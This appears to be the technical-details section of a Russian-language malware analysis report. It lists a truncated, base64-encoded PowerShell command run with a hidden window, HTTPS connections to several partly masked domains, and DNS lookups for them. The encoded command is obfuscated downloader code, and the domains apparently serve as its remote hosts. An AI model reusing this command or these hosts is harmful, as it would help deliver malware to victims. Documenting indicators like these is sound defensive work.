Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGMANwA3AG8AMQA2AD0AKAAoACcAWgB2AGMAJwArACcAcQAnACkAKwAoACcAdgA2ACcAKwAnADQAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AHUAcwBlAHIAcA...
- 'mu########ro.fairwayconcierge.com':443
- 'ry###.net.au':443
- 'su####idecafemi.com':443
- 'vi###360.com.uy':443
- 'yu####.#evinmccollow.com':443
- DNS ASK mu########ro.fairwayconcierge.com
- DNS ASK ry###.net.au
- DNS ASK su####idecafemi.com
- DNS ASK vi###360.com.uy
- DNS ASK yu####.#evinmccollow.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGMANwA3AG8AMQA2AD0AKAAoACcAWgB2AGMAJwArACcAcQAnACkAKwAoACcAdgA2ACcAKwAnADQAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AHUAcwBlAHIAcA...' (со скрытым окном)